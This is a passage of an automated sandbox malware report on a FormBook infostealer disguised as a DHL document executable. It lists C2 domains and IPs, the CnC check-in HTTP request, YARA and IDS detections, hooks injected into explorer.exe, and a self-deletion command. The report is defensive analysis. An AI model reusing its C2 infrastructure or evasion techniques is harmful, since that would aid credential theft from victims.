          SourceDetectionScannerLabelLink
          www.wed8029.com0%VirustotalBrowse

          URLs

          SourceDetectionScannerLabelLink
          http://www.uenpb.xyz/q35x/?1bL4BX=n0W6sBJt6o5hFrgQrmHErIHHCJqVSMT16xl2hKdZI7rsj0AVnZwRK3Rm3lIsVsqUahNr&TBZ8=3fcPMN0%Avira URL Cloudsafe
          www.verdugofarms.com/q35x/3%VirustotalBrowse
          www.verdugofarms.com/q35x/0%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          www.uenpb.xyz
          		1.32.255.152
          		truetrue
            		unknown
            www.wed8029.com
            		unknown
            		unknowntrueunknown

            Contacted URLs

            NameMaliciousAntivirus DetectionReputation
            http://www.uenpb.xyz/q35x/?1bL4BX=n0W6sBJt6o5hFrgQrmHErIHHCJqVSMT16xl2hKdZI7rsj0AVnZwRK3Rm3lIsVsqUahNr&TBZ8=3fcPMNtrue
            • Avira URL Cloud: safe
            		unknown
            www.verdugofarms.com/q35x/true
            • 3%, Virustotal, Browse
            • Avira URL Cloud: safe
            		low

            Contacted IPs

            • No. of IPs < 25%
            • 25% < No. of IPs < 50%
            • 50% < No. of IPs < 75%
            • 75% < No. of IPs

            Public

            IPDomainCountryFlagASNASN NameMalicious
            1.32.255.152
            		www.uenpb.xyzSingapore
            		64050BCPL-SGBGPNETGlobalASNSGtrue

            Private

            IP
            192.168.2.1

            General Information

            Joe Sandbox Version:34.0.0 Boulder Opal
            Analysis ID:532855
            Start date:02.12.2021
            Start time:18:53:41
            Joe Sandbox Product:CloudBasic
            Overall analysis duration:0h 10m 27s
            Hypervisor based Inspection enabled:false
            Report type:light
            Sample file name:DHL DOC 3406506482.exe
            Cookbook file name:default.jbs
            Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
            Number of analysed new started processes analysed:26
            Number of new started drivers analysed:0
            Number of existing processes analysed:0
            Number of existing drivers analysed:0
            Number of injected processes analysed:1
            Technologies:
            • HCA enabled
            • EGA enabled
            • HDC enabled
            • AMSI enabled
            Analysis Mode:default
            Analysis stop reason:Timeout
            Detection:MAL
            Classification:mal100.troj.evad.winEXE@7/1@5/2
            EGA Information:Failed
            HDC Information:
            • Successful, ratio: 65.9% (good quality ratio 61.3%)
            • Quality average: 71.6%
            • Quality standard deviation: 30.8%
            HCA Information:
            • Successful, ratio: 98%
            • Number of executed functions: 0
            • Number of non-executed functions: 0
            Cookbook Comments:
            • Adjust boot time
            • Enable AMSI
            • Found application associated with file extension: .exe
            Warnings:
            Show All
            • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, WerFault.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe
            • Excluded IPs from analysis (whitelisted): 204.79.197.200, 13.107.21.200
            • Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, www.bing.com, client.wns.windows.com, fs.microsoft.com, a-0001.a-afdentry.net.trafficmanager.net, store-images.s-microsoft.com, dual-a-0001.a-msedge.net, www-bing-com.dual-a-0001.a-msedge.net, ctldl.windowsupdate.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
            • Not all processes where analyzed, report is missing behavior information

            Simulations

            Behavior and APIs

            TimeTypeDescription
            18:54:37API Interceptor1x Sleep call for process: DHL DOC 3406506482.exe modified

            Joe Sandbox View / Context

            IPs

            No context

            Domains

            No context

            ASN

            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
            BCPL-SGBGPNETGlobalASNSGt6rrqsi3BpGet hashmaliciousBrowse
            • 134.122.132.42
            REQ. FOR QUOTATION.exeGet hashmaliciousBrowse
            • 1.32.254.254
            Ljm7n1QDZeGet hashmaliciousBrowse
            • 134.122.144.26
            dd#U5149.exeGet hashmaliciousBrowse
            • 118.107.44.235
            c6#U9891.exeGet hashmaliciousBrowse
            • 118.107.44.235
            f4#U6b7b.exeGet hashmaliciousBrowse
            • 118.107.44.235
            gOJtZzW63F.exeGet hashmaliciousBrowse
            • 202.79.175.12
            c85WWDlKf2.dllGet hashmaliciousBrowse
            • 202.36.49.75
            SecuriteInfo.com.Trojan.GenericKDZ.80412.21668.dllGet hashmaliciousBrowse
            • 202.36.49.75
            swift copy.exeGet hashmaliciousBrowse
            • 1.32.254.254
            TFEkbH3ag3Get hashmaliciousBrowse
            • 69.176.83.27
            00#U4e0b.exeGet hashmaliciousBrowse
            • 118.107.44.235
            c6#U9891.exeGet hashmaliciousBrowse
            • 202.79.171.220
            #U56fd#U5916#U66b4#U5229#U884c#U4e1a#U5962#U9761#U751f#U6d3b#U8bb0#U5f55#U89c6#U9891.exeGet hashmaliciousBrowse
            • 202.79.165.153
            e6#U60c5.exeGet hashmaliciousBrowse
            • 202.79.171.220
            5b#U6655.exeGet hashmaliciousBrowse
            • 69.176.89.208
            52#U7eff.exeGet hashmaliciousBrowse
            • 118.107.44.235
            Payment Order.exeGet hashmaliciousBrowse
            • 134.122.133.133
            kA1GNOTJ2VgnL02.exeGet hashmaliciousBrowse
            • 1.32.254.254
            GB0O1NUtmJGet hashmaliciousBrowse
            • 137.220.211.75

            JA3 Fingerprints

            No context

            Dropped Files

            No context

            Created / dropped Files

            C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\DHL DOC 3406506482.exe.log
            Process:C:\Users\user\Desktop\DHL DOC 3406506482.exe
            File Type:ASCII text, with CRLF line terminators
            Category:dropped
            Size (bytes):1310
            Entropy (8bit):5.345651901398759
            Encrypted:false
            SSDEEP:24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE47mE4Ko88:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKz6
            MD5:D918C6A765EDB90D2A227FE23A3FEC98
            SHA1:8BA802AD8D740F114783F0DADC407CBFD2A209B3
            SHA-256:AB0E9F716E31502A4C6786575C5E64DFD9D24AF99056BBE2640A2FA322CFF4D6
            SHA-512:A937ABD8294BB32A612F8B3A376C94111D688379F0A4DB9FAA2FCEB71C25E18D621EEBCFDA5706B71C8473A4F38D8B3C4005D1589B564F9B1C9C441B6D337814
            Malicious:true
            Reputation:moderate, very likely benign file
            Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21

            Static File Info

            General

            File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
            Entropy (8bit):7.840952482967267
            TrID:
            • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
            • Win32 Executable (generic) a (10002005/4) 49.78%
            • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
            • Generic Win/DOS Executable (2004/3) 0.01%
            • DOS Executable Generic (2002/1) 0.01%
            File name:DHL DOC 3406506482.exe
            File size:692736
            MD5:896c3c7f309a479f0ab1a9d8693b130f
            SHA1:9ad094b6799fb6deea1d2c3704576db3353d70ae
            SHA256:6f35f7c071de6ed456c189e023daa27c5b0cd007d4fcddbb13316a82ada83abe
            SHA512:c094e97eb898870a466dbc0f981ec379298805e4f5a0c5fc55291575d19dc94face2615f9db04b602ab489bd7e8d66248fa4acea3cb44117dd2106c9d08cba1c
            SSDEEP:12288:h4dN+434/7u9SOQ1saJoOqqMY0hwCvO3m36HNYi+Kebigu80DfDhJXX:hU44W7oioLq+hhWm36E3bo8WfDb
            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...Q(.a..............0.................. ........@.. ....................................@................................

            File Icon

            Icon Hash:00828e8e8686b000

            Static PE Info

            General

            Entrypoint:0x4aa582
            Entrypoint Section:.text
            Digitally signed:false
            Imagebase:0x400000
            Subsystem:windows gui
            Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
            DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
            Time Stamp:0x61A82851 [Thu Dec 2 01:58:41 2021 UTC]
            TLS Callbacks:
            CLR (.Net) Version:v4.0.30319
            OS Version Major:4
            OS Version Minor:0
            File Version Major:4
            File Version Minor:0
            Subsystem Version Major:4
            Subsystem Version Minor:0
            Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

            Entrypoint Preview

            Instruction
            jmp dword ptr [00402000h]
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al

            Data Directories

            NameVirtual AddressVirtual Size Is in Section
            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
            IMAGE_DIRECTORY_ENTRY_IMPORT0xaa5300x4f.text
            IMAGE_DIRECTORY_ENTRY_RESOURCE0xac0000x618.rsrc
            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
            IMAGE_DIRECTORY_ENTRY_BASERELOC0xae0000xc.reloc
            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
            IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

            Sections

            NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
            .text0x20000xa85880xa8600False0.915302234131data7.85043153763IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            .rsrc0xac0000x6180x800False0.3408203125data3.46786443123IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
            .reloc0xae0000xc0x200False0.044921875data0.101910425663IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

            Resources

            NameRVASizeTypeLanguageCountry
            RT_VERSION0xac0900x388data
            RT_MANIFEST0xac4280x1eaXML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

            Imports

            DLLImport
            mscoree.dll_CorExeMain

            Version Infos

            DescriptionData
            Translation0x0000 0x04b0
            LegalCopyrightCopyright Mogens Heller Grabe 2010
            Assembly Version1.0.0.0
            InternalNameSymLanguageTy.exe
            FileVersion1.0.0.0
            CompanyNameMookid8000
            LegalTrademarks
            Comments
            ProductNameTypedFactoryTjek
            ProductVersion1.0.0.0
            FileDescriptionTypedFactoryTjek
            OriginalFilenameSymLanguageTy.exe

            Network Behavior

            Snort IDS Alerts

            TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
            12/02/21-18:56:18.995145ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.58.8.8.8
            12/02/21-18:56:20.025625ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.58.8.8.8
            12/02/21-18:56:22.026347ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.58.8.8.8
            12/02/21-18:56:34.770599TCP2031453ET TROJAN FormBook CnC Checkin (GET)4980880192.168.2.51.32.255.152
            12/02/21-18:56:34.770599TCP2031449ET TROJAN FormBook CnC Checkin (GET)4980880192.168.2.51.32.255.152
            12/02/21-18:56:34.770599TCP2031412ET TROJAN FormBook CnC Checkin (GET)4980880192.168.2.51.32.255.152

            Network Port Distribution

            TCP Packets

            TimestampSource PortDest PortSource IPDest IP
            Dec 2, 2021 18:56:34.515832901 CET4980880192.168.2.51.32.255.152
            Dec 2, 2021 18:56:34.770051956 CET80498081.32.255.152192.168.2.5
            Dec 2, 2021 18:56:34.770373106 CET4980880192.168.2.51.32.255.152
            Dec 2, 2021 18:56:34.770598888 CET4980880192.168.2.51.32.255.152
            Dec 2, 2021 18:56:35.024621010 CET80498081.32.255.152192.168.2.5
            Dec 2, 2021 18:56:35.024651051 CET80498081.32.255.152192.168.2.5
            Dec 2, 2021 18:56:35.024684906 CET80498081.32.255.152192.168.2.5
            Dec 2, 2021 18:56:35.024945021 CET4980880192.168.2.51.32.255.152
            Dec 2, 2021 18:56:35.025039911 CET4980880192.168.2.51.32.255.152
            Dec 2, 2021 18:56:35.279233932 CET80498081.32.255.152192.168.2.5

            UDP Packets

            TimestampSource PortDest PortSource IPDest IP
            Dec 2, 2021 18:56:12.963686943 CET5696953192.168.2.58.8.8.8
            Dec 2, 2021 18:56:13.975543022 CET5696953192.168.2.58.8.8.8
            Dec 2, 2021 18:56:15.006789923 CET5696953192.168.2.58.8.8.8
            Dec 2, 2021 18:56:17.007019997 CET5696953192.168.2.58.8.8.8
            Dec 2, 2021 18:56:17.983330965 CET53569698.8.8.8192.168.2.5
            Dec 2, 2021 18:56:18.995060921 CET53569698.8.8.8192.168.2.5
            Dec 2, 2021 18:56:20.025499105 CET53569698.8.8.8192.168.2.5
            Dec 2, 2021 18:56:22.026230097 CET53569698.8.8.8192.168.2.5
            Dec 2, 2021 18:56:34.172086954 CET5475753192.168.2.58.8.8.8
            Dec 2, 2021 18:56:34.510354042 CET53547578.8.8.8192.168.2.5

            ICMP Packets

            TimestampSource IPDest IPChecksumCodeType
            Dec 2, 2021 18:56:18.995145082 CET192.168.2.58.8.8.8cff4(Port unreachable)Destination Unreachable
            Dec 2, 2021 18:56:20.025624990 CET192.168.2.58.8.8.8cff4(Port unreachable)Destination Unreachable
            Dec 2, 2021 18:56:22.026346922 CET192.168.2.58.8.8.8cff4(Port unreachable)Destination Unreachable

            DNS Queries

            TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
            Dec 2, 2021 18:56:12.963686943 CET192.168.2.58.8.8.80x60c6Standard query (0)www.wed8029.comA (IP address)IN (0x0001)
            Dec 2, 2021 18:56:13.975543022 CET192.168.2.58.8.8.80x60c6Standard query (0)www.wed8029.comA (IP address)IN (0x0001)
            Dec 2, 2021 18:56:15.006789923 CET192.168.2.58.8.8.80x60c6Standard query (0)www.wed8029.comA (IP address)IN (0x0001)
            Dec 2, 2021 18:56:17.007019997 CET192.168.2.58.8.8.80x60c6Standard query (0)www.wed8029.comA (IP address)IN (0x0001)
            Dec 2, 2021 18:56:34.172086954 CET192.168.2.58.8.8.80x1ecfStandard query (0)www.uenpb.xyzA (IP address)IN (0x0001)

            DNS Answers

            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
            Dec 2, 2021 18:56:17.983330965 CET8.8.8.8192.168.2.50x60c6Server failure (2)www.wed8029.comnonenoneA (IP address)IN (0x0001)
            Dec 2, 2021 18:56:18.995060921 CET8.8.8.8192.168.2.50x60c6Server failure (2)www.wed8029.comnonenoneA (IP address)IN (0x0001)
            Dec 2, 2021 18:56:20.025499105 CET8.8.8.8192.168.2.50x60c6Server failure (2)www.wed8029.comnonenoneA (IP address)IN (0x0001)
            Dec 2, 2021 18:56:22.026230097 CET8.8.8.8192.168.2.50x60c6Server failure (2)www.wed8029.comnonenoneA (IP address)IN (0x0001)
            Dec 2, 2021 18:56:34.510354042 CET8.8.8.8192.168.2.50x1ecfNo error (0)www.uenpb.xyz1.32.255.152A (IP address)IN (0x0001)

            HTTP Request Dependency Graph

            • www.uenpb.xyz

            HTTP Packets

            Session IDSource IPSource PortDestination IPDestination PortProcess
            0192.168.2.5498081.32.255.15280C:\Windows\explorer.exe
            TimestampkBytes transferredDirectionData
            Dec 2, 2021 18:56:34.770598888 CET16140OUTGET /q35x/?1bL4BX=n0W6sBJt6o5hFrgQrmHErIHHCJqVSMT16xl2hKdZI7rsj0AVnZwRK3Rm3lIsVsqUahNr&TBZ8=3fcPMN HTTP/1.1
            Host: www.uenpb.xyz
            Connection: close
            Data Raw: 00 00 00 00 00 00 00
            Data Ascii:
            Dec 2, 2021 18:56:35.024651051 CET16140INHTTP/1.1 404 Not Found
            Server: nginx
            Date: Thu, 02 Dec 2021 17:56:34 GMT
            Content-Type: text/html
            Content-Length: 146
            Connection: close
            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


            Code Manipulations

            User Modules

            Hook Summary

            Function NameHook TypeActive in Processes
            PeekMessageAINLINEexplorer.exe
            PeekMessageWINLINEexplorer.exe
            GetMessageWINLINEexplorer.exe
            GetMessageAINLINEexplorer.exe

            Processes

            Process: explorer.exe, Module: user32.dll
            Function NameHook TypeNew Data
            PeekMessageAINLINE0x48 0x8B 0xB8 0x82 0x2E 0xE6
            PeekMessageWINLINE0x48 0x8B 0xB8 0x8A 0xAE 0xE6
            GetMessageWINLINE0x48 0x8B 0xB8 0x8A 0xAE 0xE6
            GetMessageAINLINE0x48 0x8B 0xB8 0x82 0x2E 0xE6

            Statistics

            Behavior

            Click to jump to process

            System Behavior

            Analysis Process: DHL DOC 3406506482.exe PID: 4824 Parent PID: 6024

            General

            Start time:18:54:36
            Start date:02/12/2021
            Path:C:\Users\user\Desktop\DHL DOC 3406506482.exe
            Wow64 process (32bit):true
            Commandline:"C:\Users\user\Desktop\DHL DOC 3406506482.exe"
            Imagebase:0x3b0000
            File size:692736 bytes
            MD5 hash:896C3C7F309A479F0AB1A9D8693B130F
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:.Net C# or VB.NET
            Yara matches:
            • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.248588915.0000000002791000.00000004.00000001.sdmp, Author: Joe Security
            • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.248628674.00000000027CD000.00000004.00000001.sdmp, Author: Joe Security
            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.249416535.0000000003799000.00000004.00000001.sdmp, Author: Joe Security
            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.249416535.0000000003799000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.249416535.0000000003799000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
            Reputation:low

            Analysis Process: DHL DOC 3406506482.exe PID: 3488 Parent PID: 4824

            General

            Start time:18:54:38
            Start date:02/12/2021
            Path:C:\Users\user\Desktop\DHL DOC 3406506482.exe
            Wow64 process (32bit):true
            Commandline:C:\Users\user\Desktop\DHL DOC 3406506482.exe
            Imagebase:0x490000
            File size:692736 bytes
            MD5 hash:896C3C7F309A479F0AB1A9D8693B130F
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Yara matches:
            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000000.245861481.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000000.245861481.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000000.245861481.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.316002438.0000000000AD0000.00000040.00020000.sdmp, Author: Joe Security
            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.316002438.0000000000AD0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.316002438.0000000000AD0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.315948001.00000000009C0000.00000040.00020000.sdmp, Author: Joe Security
            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.315948001.00000000009C0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.315948001.00000000009C0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000000.246580702.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000000.246580702.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000000.246580702.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.315617862.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.315617862.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.315617862.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
            Reputation:low

            Analysis Process: explorer.exe PID: 3472 Parent PID: 3488

            General

            Start time:18:54:42
            Start date:02/12/2021
            Path:C:\Windows\explorer.exe
            Wow64 process (32bit):false
            Commandline:C:\Windows\Explorer.EXE
            Imagebase:0x7ff693d90000
            File size:3933184 bytes
            MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Yara matches:
            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000000.290164309.00000000070EF000.00000040.00020000.sdmp, Author: Joe Security
            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000000.290164309.00000000070EF000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000000.290164309.00000000070EF000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000000.275035294.00000000070EF000.00000040.00020000.sdmp, Author: Joe Security
            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000000.275035294.00000000070EF000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000000.275035294.00000000070EF000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
            Reputation:high

            Analysis Process: explorer.exe PID: 1004 Parent PID: 3472

            General

            Start time:18:55:08
            Start date:02/12/2021
            Path:C:\Windows\SysWOW64\explorer.exe
            Wow64 process (32bit):true
            Commandline:C:\Windows\SysWOW64\explorer.exe
            Imagebase:0x290000
            File size:3611360 bytes
            MD5 hash:166AB1B9462E5C1D6D18EC5EC0B6A5F7
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Yara matches:
            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000E.00000002.513609784.0000000002D70000.00000040.00020000.sdmp, Author: Joe Security
            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000E.00000002.513609784.0000000002D70000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
            • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000E.00000002.513609784.0000000002D70000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000E.00000002.513416867.0000000002C70000.00000040.00020000.sdmp, Author: Joe Security
            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000E.00000002.513416867.0000000002C70000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
            • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000E.00000002.513416867.0000000002C70000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000E.00000002.512624428.0000000000790000.00000004.00000001.sdmp, Author: Joe Security
            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000E.00000002.512624428.0000000000790000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
            • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000E.00000002.512624428.0000000000790000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
            Reputation:high

            Analysis Process: cmd.exe PID: 4140 Parent PID: 1004

            General

            Start time:18:55:14
            Start date:02/12/2021
            Path:C:\Windows\SysWOW64\cmd.exe
            Wow64 process (32bit):true
            Commandline:/c del "C:\Users\user\Desktop\DHL DOC 3406506482.exe"
            Imagebase:0x150000
            File size:232960 bytes
            MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high

            Analysis Process: conhost.exe PID: 1688 Parent PID: 4140

            General

            Start time:18:55:16
            Start date:02/12/2021
            Path:C:\Windows\System32\conhost.exe
            Wow64 process (32bit):false
